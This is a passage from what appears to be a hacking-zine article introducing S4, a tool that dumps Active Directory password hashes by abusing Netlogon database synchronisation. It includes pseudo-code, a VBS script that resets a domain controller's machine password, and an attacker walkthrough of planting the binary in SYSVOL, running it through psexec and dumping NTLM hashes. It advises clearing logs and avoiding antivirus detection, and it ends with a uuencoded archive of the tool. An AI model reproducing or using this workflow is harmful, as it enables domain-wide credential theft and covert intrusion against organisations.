+# the server and not from some rogue DC.
+
+NlUpdateSeed(
+    NewClientChallenge,
+    ReturnAuthenticator,
+    SessionKey
+    )
+{
+    BYTE TempOut[8];
+
+    NewClientChallenge[0]++;
+    Encrypt000(
+        NewClientChallenge,
+        TempOut,
+        SessionKey);
+
+    if( ReturnAuthenticator->Credential == TempOut )
+        return 1;
+
+    return 0;
+}
+---------------------------------------------------------------------------
+
+Let's put aside the usual Microsoft crypto weirdness of the protocol
+because this is not the subject of this article. In a nutshell:
+
+    - The client (BDC) and the server (PDC) both compute a session key
+      using random challenges (to avoid replay attacks) and a 'secret' MD4
+      key.
+    - Once a trusted bond between them is established, the server sends
+      several objects (of type DeltaArray) which should contain the
+      expected secrets. The trusted bond is called a 'secure channel' in
+      Microsoft's documentation.
+    - To avoid man-in-middle attempts, the exchanges are somehow
+      authenticated using the session key (which has another purpose, but
+      that's another story my friends).
+
+Now, if you have been attentive you may have realized that I never
+mentioned any LSA related functions (remember lsarpc bind?) and that the
+session key would be really easy to deduce for a passive observer (sniffer)
+because the shared secret (%BDC_NAME% + "$") is predictable. And indeed, it
+didn't work when I first tested the code built upon the reverse engineering
+process. I_NetServerAuthenticate() kicked me out with the classical "Access
+Denied" message.
+
+So what went wrong? I was almost sure that the lsa_() functions were not
+necessary because they are not used in nltest.exe. So this led me to think
+that somehow NewClientChallenge wasn't correct. Assuming the algorithm was
+well reversed, the session key produced by NlMakeSessionKey() had to be
+erroneous. Strange? Not quite. Remember that the MD4 key is somehow weird.
+Even considering Microsoft's past, it was hard to believe that they would
+base the security of their protocol on such a value. And indeed they aren't
+that crazy! Using the appropriate hook in LSASS, I found out that this MD4
+was in fact the client's computer account hash (NTLM)! A result that I
+would later find almost everywhere whenever looking for some information on
+the so-called 'secure channel'. Sometimes you just have to keep looking...
+
+The problem is that retrieving the BDC's computer account NTLM is
+(probably) as hard as retrieving the whole SAM itself. So how do we deal
+with the Ouroboros? The solution is actually quite simple: we may not know
+the NTLM hash, but we can easily change it! Look at this nice piece of 
+code:
+
+-------------------------------[ passwd.vbs ]------------------------------
+Dim objComputer
+
+Set objComputer = GetObject("WinNT://foo.bar/DC2$")
+objComputer.SetPassword "dummy"
+
+Wscript.Quit
+---------------------------------------------------------------------------
+
+Executing the VBS script on the 'BDC' is enough (remember that we own a
+domain administrator account). The cool thing with this trick is that the
+BDC will then synchronize its password with the 'PDC' for us. Cool trick
+right? And this proved to be enough to have I_NetDatabaseSync()
+successfully returning. In the tool that I wrote, I implemented it using
+the IADsUser::SetPassword() method.
+
+                             >>>>>>>>>>>>>>>>>>
+I was lucky with the nltest.exe analysis because I didn't use the Windows
+2008 version. On Windows 2008 server, I_NetDatabaseSync() isn't used so it
+would have forced me to reverse engineer Samba's C code which is far more
+difficult believe me :-P
+                             <<<<<<<<<<<<<<<<<<
+
+
+---[ 5 - Extracting the secrets
+
+
+Now that this part of the job is finished, we only need to know how to
+parse the DeltaArray objects, something partially documented by Microsoft
+[09]. nltext.exe doesn't perform this task (it only tests that the
+synchronization is working and frees the DeltaArray objects that it
+receives) but obviously samba-tool does.
+
+
+-----[ 5.1 - Browsing samba-tool's source code
+
+
+Everything starts in source4/samba_tool/samba_tool.c:
+
+    1. main() calls binary_net(), the main function
+    2. binary_net() then:
+
+         - Initializes the Python interpreter using Py_Initialize()
+
+         - Creates a dictionary out of the "samba.netcmd" module using
+           py_commands() which returns the Python object "commands". This
+           object is created in:
+           source4/scripting/python/samba/netcmd/__init__.py:
+
+           -------------------------------------------------------
+           commands = {}
+           from samba.netcmd.pwsettings import cmd_pwsettings
+           commands["pwsettings"] = cmd_pwsettings()
+           from samba.netcmd.domainlevel import cmd_domainlevel
+           commands["domainlevel"] = cmd_domainlevel()
+           from samba.netcmd.setpassword import cmd_setpassword
+           commands["setpassword"] = cmd_setpassword()
+           from samba.netcmd.newuser import cmd_newuser
+           commands["newuser"] = cmd_newuser()
+           from samba.netcmd.netacl import cmd_acl
+           [...]
+           -------------------------------------------------------
+
+    3. There are 3 possible situations:
+
+         - If argv[1] is handled by a Python module then commands[argv[1]]
+           is not void and the corresponding method is called.
+
+         - Else if argv[1] is in net_functable[] then a C function is
+           handling the command.
+
+         - Else argv[1] is not a legitimate command => error msg!
+
+In the case of 'samdump', it is implemented in the C language by the
+net_samdump() function available in source4/samba_tool/vampire.c. This
+function calls libnet_SamSync_netlogon() (source4/libnet/libnet_samsync.c)
+which:
+
+    - Establishes the secure channel
+    - Calls dcerpc_netr_DatabaseSync_r() 3 times (1 per DatabaseID value)
+    - Calls samsync_fix_delta() in (libcli/samsync/decrypt.c) which handles
+      the decryption (if required). Remember this function.
+
+
+-----[ 5.2 - Understanding database changes
+
+
+I_NetDatabaseSync() returns DeltaArray which is a NETLOGON_DELTA_ENUM_ARRAY
+object. It's very well documented by Microsoft:
+
+-----------------------[ MS official documentation ]-----------------------
+// http://msdn.microsoft.com/en-us/library/cc237083%28v=prot.13%29.aspx
+typedef struct _NETLOGON_DELTA_ENUM_ARRAY {
+  DWORD CountReturned;
+  [size_is(CountReturned)] PNETLOGON_DELTA_ENUM Deltas;
+} NETLOGON_DELTA_ENUM_ARRAY,
+ *PNETLOGON_DELTA_ENUM_ARRAY;
+
+// http://msdn.microsoft.com/en-us/library/cc237082%28v=prot.13%29.aspx
+typedef struct _NETLOGON_DELTA_ENUM {
+  NETLOGON_DELTA_TYPE DeltaType;
+  [switch_is(DeltaType)] NETLOGON_DELTA_ID_UNION DeltaID;
+  [switch_is(DeltaType)] NETLOGON_DELTA_UNION DeltaUnion;
+} NETLOGON_DELTA_ENUM,
+ *PNETLOGON_DELTA_ENUM;
+---------------------------------------------------------------------------
+
+So basically DeltaArray is an array of NETLOGON_DELTA_ENUM objects.
+Depending on their DeltaType field, the receiver will know how to parse
+their internal fields (DeltaID and DeltaUnion). According to Microsoft,
+DeltaType may take the following values:
+
+-----------------------[ MS official documentation ]-----------------------
+// http://msdn.microsoft.com/en-us/library/cc237100%28v=prot.13%29.aspx
+The NETLOGON_DELTA_TYPE enumeration defines an enumerated set of possible
+database changes.
+
+typedef  enum _NETLOGON_DELTA_TYPE
+{
+  AddOrChangeDomain = 1,
+  AddOrChangeGroup = 2,
+  DeleteGroup = 3,
+  RenameGroup = 4,
+  AddOrChangeUser = 5,
+  DeleteUser = 6,
+  RenameUser = 7,
+  ChangeGroupMembership = 8,
+  AddOrChangeAlias = 9,
+  DeleteAlias = 10,
+  RenameAlias = 11,
+  ChangeAliasMembership = 12,
+  AddOrChangeLsaPolicy = 13,
+  AddOrChangeLsaTDomain = 14,
+  DeleteLsaTDomain = 15,
+  AddOrChangeLsaAccount = 16,
+  DeleteLsaAccount = 17,
+  AddOrChangeLsaSecret = 18,
+  DeleteLsaSecret = 20,
+  DeleteGroupByName = 20,
+  DeleteUserByName = 21,
+  SerialNumberSkip = 22
+} NETLOGON_DELTA_TYPE;
+---------------------------------------------------------------------------
+
+When dcerpc_netr_DatabaseSync_r() returns, samsync_fix_delta() is called
+for each NETLOGON_DELTA_ENUM object. The source code of this function is
+straightforward (libcli/samsync/decrypt.c):
+
+--------------------------[ Samba 4 source code ]--------------------------
+NTSTATUS samsync_fix_delta(TALLOC_CTX *mem_ctx,
+                           struct netlogon_creds_CredentialState *creds,
+                           enum netr_SamDatabaseID database_id,
+                           struct netr_DELTA_ENUM *delta)
+{
+        NTSTATUS status = NT_STATUS_OK;
+
+        switch (delta->delta_type) {
+                case NETR_DELTA_USER:
+
+                        status = fix_user(mem_ctx,
+                                          creds,
+                                          database_id,
+                                          delta);
+                        break;
+                case NETR_DELTA_SECRET:
+
+                        status = fix_secret(mem_ctx,
+                                            creds,
+                                            database_id,
+                                            delta);
+                        break;
+                default:
+                        break;
+        }
+
+        return status;
+}
+---------------------------------------------------------------------------
+
+So to summarize, amongst all the NETLOGON_DELTA_ENUM that
+I_NetDatabaseSync() provides us, the only important ones are those of type
+AddOrChangeUser (NETR_DELTA_USER) and AddOrChangeLsaSecret
+(NETR_DELTA_SECRET).
+
+
+-----[ 5.3 - Retrieving the hashes
+
+
+Because the subject of this paper is pwdump-like tools, we will only focus
+our attention on the AddOrChangeUser type. Here is the code that I used to
+extract the useful objects:
+
+----------------------------[ S4 source code ]-----------------------------
+	PNETLOGON_DELTA_ENUM Deltas = DeltaArray->Deltas;
+	for(i=0; i<DeltaArray->CountReturned; i++)
+	{
+
+#ifdef __debug__
+		if(Deltas->DeltaType == AddOrChangeLsaSecret)
+		{
+            [...]
+		}
+#endif
+
+		if(Deltas->DeltaType == AddOrChangeUser)
+        {
+			PNETLOGON_DELTA_USER DUser;
+			DUser = (PNETLOGON_DELTA_USER)
+				Deltas->DeltaUnion.DeltaUser;
+
+			arcfour_crypt_blob(
+				DUser->PrivateData.Data,
+				DUser->PrivateData.DataLength,
+				SessionKey,
+				16);
+			[...]
+		}
+[...]
+---------------------------------------------------------------------------
+
+The NETLOGON_DELTA_USER object holds information about a particular User
+of the domain including its Username and (hashed) password. However
+depending on the value of NtPasswordPresent and LmPasswordPresent, the
+password may not be available in the EncryptedNtOwfPassword and
+EncryptedLmOwfPassword fields of the structure. In this case, they are
+stored instead in the PrivateData.Data buffer which is RC4 encrypted
+using the SessionKey. Practically speaking, this last case is the only one
+I've ever witnessed.
+
+The PrivateData.Data buffer holds a copy of the information returned by
+SamIGetPrivateData() which is a function called by pwdump6. The current
+(and potentially former) hashed passwords are stored somehow in this buffer
+and ripping the appropriate functions in the pwdump6 tool grants us the
+Holy Grail. There is no need to explain what is already common knowledge in
+the windows hacking world.  Have a look at the DealWithDeltaArray()
+function in my code if you have any questions.
+
+
+---[ 6 - A practical introduction to S4 (Stealth & Secure Secret Stealer)
+
+
+All this work ultimately resulted in a single tool: S4 (courtesy of the
+grateful p1ckp0ck3t to the Samba team ;]). I've chosen to release it under
+the GPL because I certainly disliked the idea of the pigs from MSF
+including it in their framework. That said, "let the hacking begin".
+
+                                  Context
+                                  +++++++
+
+We have a CMD shell on some XP/Seven box part of the 'foo.bar' 2003 domain.
+Somehow we also got our hands on the credentials of a domain administrator:
+"Administrator / foo123"
+
+Our goal is simple; we now want to extract the passwords from the AD.
+
+                              Locating the PDC
+                              ++++++++++++++++
+
+Retrieving the location of the DC is as easy as performing a DNS request on
+the domain name (foo.bar). However the problems with this approach are
+that:
+    - it gives DNS servers as well,
+    - it doesn't allow us to locate the PDC amongst the DCs.
+
+Fortunately, the dsquery tool is providing the information:
+
+------------------------------[ screendump ]-------------------------------
+C:\Users\Administrator>dsquery server -hasfsmo PDC
+"CN=DC3,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=
+foo,DC=bar"
+
+C:\Users\Administrator>
+---------------------------------------------------------------------------
+
+Now if for some reason this command isn't available, you can use the -D
+option of S4 which is based on DsGetDomainControllerInfo().
+
+------------------------------[ screendump ]-------------------------------
+C:\Users\Administrator>S4.exe -D -d foo.bar
+[> Discovery mode
+        - DC controller 0 is DC3.foo.bar [PDC]
+        - DC controller 1 is DC4.foo.bar
+
+C:\Users\Administrator>
+---------------------------------------------------------------------------
+
+At this point, we know that DC3 is the PDC and DC4 (the only remaining DC)
+is de facto a BDC. S4.exe will thus be executed from DC4, targeting DC3.
+
+                               Uploading S4
+                               ++++++++++++
+
+To run S4 on DC4, you first have to upload it. \\%DCNAME%\SYSVOL is
+convenient for this purpose. To drop a file in this directory, you will use
+the Domain Administrator account:
+
+------------------------------[ screendump ]-------------------------------
+c:\S4>hostname
+WINXP
+C:\S4>net use P: \\DC4\SYSVOL
+Enter the user name for 'DC4': administrator
+Enter the password for DC4:
+The command completed successfully.
+
+C:\S4>copy S4.exe P:\randomname.exe
+        1 file(s) copied.
+
+C:\S4>net use P: /DELETE
+P: was deleted successfully
+---------------------------------------------------------------------------
+
+                   Checking the state of the replication
+                   +++++++++++++++++++++++++++++++++++++
+
+It's always good to have an idea of how healthy the replication is on this
+Active Directory because we will interfere deeply. I've never tested the
+technique in an environment prone to replication troubles so I would
+recommend you to be careful.
+
+First log into the BDC using psexec (or your own tool). Then use repadmin
+which will most likely be installed on the box (if not even native) as it
+will give you the details of last operations:
+
+------------------------------[ screendump ]-------------------------------
+C:\S4>.\Tools\PsTools\psexec.exe \\DC4 -u FOO\administrator cmd.exe
+
+PsExec v1.94 - Execute processes remotely
+Copyright (C) 2001-2008 Mark Russinovich
+Sysinternals - www.sysinternals.com
+
+Password: ******  <-- foo123
+
+Microsoft Windows [Version 5.2.3790]
+(C) Copyright 1985-2003 Microsoft Corp.
+
+C:\WINDOWS\system32>repadmin /showrepl *
+
+repadmin running command /showrepl against server dc3.foo.bar
+
+Default-First-Site-Name\DC3
+DC Options: IS_GC
+Site Options: (none)
+DC object GUID: 265b7dba-578b-47f1-91ca-78b3019e937d
+DC invocationID: 265b7dba-578b-47f1-91ca-78b3019e937d
+
+==== INBOUND NEIGHBORS ======================================
+
+DC=foo,DC=bar
+    Default-First-Site-Name\DC4 via RPC
+        DC object GUID: 5e66dd87-69a1-485e-8e4e-172def165b06
+        Last attempt @ 2012-03-21 00:32:47 was successful.
+
+[...]
+
+repadmin running command /showrepl against server dc4.foo.bar
+
+Default-First-Site-Name\DC4
+DC Options: (none)
+Site Options: (none)
+DC object GUID: 5e66dd87-69a1-485e-8e4e-172def165b06
+DC invocationID: be4bbd07-2a84-4c73-a00c-8260999ea3f8
+
+==== INBOUND NEIGHBORS ======================================
+
+DC=foo,DC=bar
+    Default-First-Site-Name\DC3 via RPC
+        DC object GUID: 265b7dba-578b-47f1-91ca-78b3019e937d
+        Last attempt @ 2012-03-21 00:46:37 was successful.
+
+[...]
+C:\WINDOWS\system32>
+---------------------------------------------------------------------------
+
+This AD is healthy because there is no problem reported. BTW one little
+advice: avoid using your beloved MSF as a psexec-like tool because it has a
+good chance to be detected by an AV.
+
+                           Running S4 on the BDC
+                           +++++++++++++++++++++
+
+At this point, the only remaining thing to do is to run S4.exe!
+
+------------------------------[ screendump ]-------------------------------
+C:\WINDOWS\system32>\\DC4\SYSVOL\randomname.exe
+[!!] 3 arguments are required!
+
+    \\Vboxsvr\vmware\S4.exe -p PDC_NAME -b BDC_NAME -d DOMAIN [-P password]
+
+                        OR
+
+    \\Vboxsvr\vmware\S4.exe -D -d DOMAIN
+
+C:\WINDOWS\system32>\\DC4\SYSVOL\randomname.exe -p DC3 -b DC4 -d foo.bar
+Administrator:500:6F6D84B5C1DDCB7AAAD3B435B51404EE:
+                  23DBA86EAA18933844864F24A54EBFBF:::
+Guest:501:B3CC5A77A68F6477612A53E12DFC183B:
+          B3CC5A77A68F6477612A53E12DFC183B:::
+krbtgt:502:7396CE194FA9157E5993429157021505:
+           3803F74802050CE62B047668F303B453:::
+SUPPORT_388945a0:1001:8FCA67CF5A9FEB7DB06FDACBE2EFDEAB:
+                      5D798B0AB3CCC22FCD7D333D06E2D785:::
+DC3$:1003:C6DD50758AC2B23B9C63DFB8BC64840C:
+          820B5403DF3484530F644090C564E342:::
+DC3$_history_0:1003:C6DD50758AC2B23B9C63DFB8BC64840C:
+                    9CDEE73ADFA23ED3FEC2CC575EF9D0A7:::
+DC4$:1108:8C6AC94AD2F708E2AAD3B435B51404EE:
+          F77ACB17249932BA36990D85D0F7E01A:::
+DC4$_history_0:1108:CA1CDCD62E2662912950352F77B2EC2C:
+                    5E54C47654328C3C7B541A81D6319837:::
+DC4$_history_1:1108:C233128D17B4A8C47838115D84C67E42:
+                    F77ACB17249932BA36990D85D0F7E01A:::
+---------------------------------------------------------------------------
+
+For compatibility purposes, I kept the format used by pwdump-like tools :]
+Just a little test to be sure that the results are not fucked. Fire a
+Python shell and compute the hash of the Administrator:
+
+------------------------------[ screendump ]-------------------------------
+>>> import hashlib,binascii
+>>> hash = hashlib.new('md4', "foo123".encode('utf-16le')).digest()
+>>> print binascii.hexlify(hash).upper()
+23DBA86EAA18933844864F24A54EBFBF
+>>>
+---------------------------------------------------------------------------
+
+And that's exactly the NTLM of the Administrator \o/
+
+                              Fixing the mess
+                              +++++++++++++++
+
+Now be careful with what I'm about to say because it's *very* important.
+Changing a BDC's machine account password using IADsUser::SetPassword()
+breaks somehow the secure channel between the BDC and the PDC. Breaking the
+secure channel means basically breaking the trust between DCs ultimately
+resulting in a DoS (errors in logs, no more synchronization, ...). Oops :]
+
+This can easily be seen by typing the command:
+
+------------------------------[ screendump ]-------------------------------
+C:\WINDOWS\system32>nltest /SC_CHANGE_PWD:foo.bar
+I_NetLogonControl failed: Status = 5 0x5 ERROR_ACCESS_DENIED
+---------------------------------------------------------------------------
+
+The same command would *not* have failed on DC3 (or on DC4 before changing
+the password). Fortunately, using the Administrator's credentials, you can
+use the *very* useful netdom tool [13] to fix this problem:
+
+------------------------------[ screendump ]-------------------------------
+C:\WINDOWS\system32>netdom RESETPWD /Server:DC3 /UserD:Administrator
+/PasswordD:*
+Type the password associated with the domain user:
+
+The machine account password for the local machine has been successfully
+reset.
+
+The command completed successfully.
+
+C:\WINDOWS\system32>netdom RESET DC4
+The secure channel from DC4 to the domain FOO has been reset.  The
+connection is with the machine \\DC3.FOO.BAR.
+
+The command completed successfully.
+---------------------------------------------------------------------------
+
+Just to prove you that the situation is indeed fixed:
+
+------------------------------[ screendump ]-------------------------------
+C:\WINDOWS\system32>nltest /SC_CHANGE_PWD:foo.bar
+nltest /SC_CHANGE_PWD:foo.bar
+Flags: 0
+Connection Status = 0 0x0 NERR_Success
+The command completed successfully
+---------------------------------------------------------------------------
+
+We're safe! Clean the logs and leave the box :]
+
+
+---[ 7 - S4 .VS. Windows 2008 Domain Controllers
+
+
+While the technique implemented in S4 is very effective if the PDC is a
+Windows 2003 server, it totally fails if it's a Windows 2008 (or higher)
+server and this unfortunately holds even if the Domain's functional level
+is "Windows Server 2003".
+
+The first problem that I encountered was that while I was still able to
+have the new machine account's NTLM propagated, the establishment of the
+secure channel always failed, an "access denied" being returned by
+NetrServerAuthenticate2(). Because I suspected some evolution in the
+protocol, I began to look for information on Netlogon, only to discover
+that Microsoft had already published its specification [10]. My bad! If I
+had been more careful I would have saved time as there was no real need to
+reverse nltest.exe :] Reading the specifications, I discovered something
+really interesting that I had failed to notice through the reversing
+process; there are different algorithms to compute the session key.
+
+Long story short, when a client initiates a connection to the server, it
+first provides its capabilities using the NegotiateFlags parameter of
+NetrServerAuthenticate(). In return, the server will set this parameter to
+provide his own capabilities. This is the way that they both agree on the
+algorithm used to compute the session key.
+
+There are basically three types of session keys (see section 3.1.4.3 of
+[10]):
+
+    1/ AES (strong)
+    2/ 'Strong-Key' which is HMAC-MD5 based (weaker)
+    3/ DES (weak)
+
+The third one is implemented in S4's NlMakeSessionKey() and is also the
+oldest. For compatibility purposes, Windows 2003 is still accepting this
+weak way of computing keys. This explains why the authentication process
+was OK. Starting with Windows 2008, security has been enhanced and the
+minimum required by default is now Strong-Key; I implemented it and the
+authentication is now compatible with Windows 2008 :]
+
+<Note>
+There exists a workaround (Hi D.) to keep using a weak DES session key with
+a Windows 2008 server. Google() the key words "NT4Emulator" and
+"AllowNT4Crypto" for more details (also have a look at the GPO).
+</Note>
+
+Unfortunately this was not sufficient as NetrDatabaseSync() was now
+returning a STATUS_NOT_SUPPORTED. Digging in "[MS-NRPC]: Netlogon Remote
+Protocol Specification" I found the following explanation (rev 24):
+
+-----------------------[ MS official documentation ]-----------------------
+If a server does not support a specific Netlogon RPC method, it MUST return
+ERROR_NOT_SUPPORTED or STATUS_NOT SUPPORTED, based on the return type
+---------------------------------------------------------------------------
+
+The revision is important because in revision 22 NetrDatabaseSync() is
+documented whereas it's not anymore in revision 24. It mysteriously
+disappeared... If we consider the previous quote, it seems fair to assume
+that at some point the function was declared deprecated. Unfortunately the
+reason is probably mentioned in revision 23 which seems currently
+unavailable. Who knows, we might some day have the appropriate explanation.
+However "deprecated" doesn't mean "gone" so it *might* be interesting to
+reverse engineer the function ;]
+
+Btw a little trick to help you:
+
+------------------------------[ screendump ]-------------------------------
+C:\Users\Administrator>nltest /dbflag:ffffffff
+SYSTEM\CurrentControlSet\Services\Netlogon\Parameters set to 0xffffffff
+Flags: 0
+Connection Status = 0 0x0 NERR_Success
+The command completed successfully
+
+C:\Users\Administrator>type %WINDIR%\debug\netlogon.log
+[...]
+04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: DC10$: Message
+: dbcbaafc aba49ab9 f6bcabb5 62380816   ..............8b
+04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: New Password:
+b6b852a3 5ec54dc9 9ea3917e c51d19fa   .R...M.^~.......
+04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: New Digest: d4
+67786d a92bd731 7da18262 3d1cdb4f   mxg.1.+.b..}O..=
+04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: Old Password:
+b6b852a3 5ec54dc9 9ea3917e c51d19fa   .R...M.^~.......
+04/04 22:23:34 [ENCRYPT] NetrLogonComputeServerDigest: 1105: Old Digest: d4
+67786d a92bd731 7da18262 3d1cdb4f   mxg.1.+.b..}O..=
+[...]
+---------------------------------------------------------------------------
+
+
+---[ 8 - Additional details
+
+
+a) Are there other alternatives to dump the AD's passwords?
+
+Well apart from pwdump-like techniques, there is at least one more:
+ntds.dit [11] file dumping. In a nutshell, this file is a Jet Blue database
+holding (amongst other things) information about the users. When an LDAP
+query is issued, this database is interrogated. Because it's very sensitive
+(passwords are stored inside), it's both encrypted and system locked thus
+it's not trivial to dump its content. I wasn't aware until recently of any
+tool able to deal with it. It seems that things have changed because I've
+heard some rumors. There should be at least two other alternatives, but I
+won't say more. Be smart and find them yourself :]
+
+b) What about real-life filtering & the requirement of 2 DCs??
+
+The first requirement for the attack is the ability to execute arbitrary
+commands on one of the DCs. One is enough as by design all of them are
+communicating with one another without any restrictions (=filtering).
+
+The second requirement is the existence of at least 2 DCs. Apart from tiny
+corporations, there will always be at least 2 DCs (for business continuity
+in case of a disaster or maintenance operation) so it's no big deal either.
+
+
+c) What about Samba 4 .VS. Windows 2008?
+
+Well, have a look at samba-4.0.0alpha18.tgz :]
+
+
+---[ 9 - Last words
+
+
+The original title of the paper was something like:
+         "The art of the laziness: exploiting the Samba 4 project"
+
+What I wanted to highlight is that sometimes with only a few ideas and
+minimal efforts you can come up with new tools & techniques. Read the S4
+source code, test it, improve it and use it wisely. As they all say:
+
+               Happy Hacking! :-]
+
+                                        -- High 5 to my fellows
+
+---[ 10 - Bibliography
+
+
+[01]  http://en.wikipedia.org/wiki/Pwdump
+[02]  http://en.wikipedia.org/wiki/Active_Directory
+[03]  http://wiki.samba.org/index.php/Samba4
+[04]  http://securite.intrinsec.com/2010/09/07/
+      rd-outil-dextraction-de-mots-de-passe-ad/
+[05]  http://msdn.microsoft.com/en-us/library/cc237290%28v=prot.13%29.aspx
+[06]  http://en.wikipedia.org/wiki/Primary_Domain_Controller
+[07]  http://www.microsoft.com/download/en/details.aspx?id=16770
+[08]  http://msdn.microsoft.com/en-us/library/cc237225%28v=prot.13%29.aspx
+[09]  http://msdn.microsoft.com/en-us/library/cc237082%28v=prot.13%29.aspx
+[10]  http://msdn.microsoft.com/en-us/library/cc237008%28v=prot.10%29.aspx
+[11]  http://www.stoyanoff.info/blog/2012/02/11/ad-data-store-part-1/
+[12]  http://en.wikipedia.org/wiki/Flexible_single_master_operation
+[13]  http://technet.microsoft.com/en-us/library/cc772217%28v=ws.10%29.aspx
+[14]  http://technet.microsoft.com/en-us/library/cc776877%28WS.10%29.aspx
+
+
+---[ 11 - c0de: S4
+
+
+begin 755 S4.p68.zip
+M4$L#!`H``````-%>A4`````````````````'````4S0N<#8X+U!+`P04``(`
+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
